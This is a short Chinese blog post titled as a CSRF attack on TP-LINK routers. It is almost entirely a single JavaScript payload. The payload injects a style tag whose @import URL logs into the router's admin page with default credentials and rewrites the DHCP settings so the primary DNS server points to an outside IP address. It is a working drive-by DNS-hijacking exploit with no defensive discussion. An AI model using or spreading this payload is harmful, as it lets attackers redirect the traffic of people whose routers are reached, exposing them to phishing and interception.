TP-LINK的CSRF攻击 

写了一个style标签import一个css调用:
document.writeln('<style type="text/css">@import url(http://admin:[email protected]/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=106.187.36.85&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6);</style>')
posted @ 2018-01-10 18:40  journeyIT  阅读(371)  评论(0编辑  收藏  举报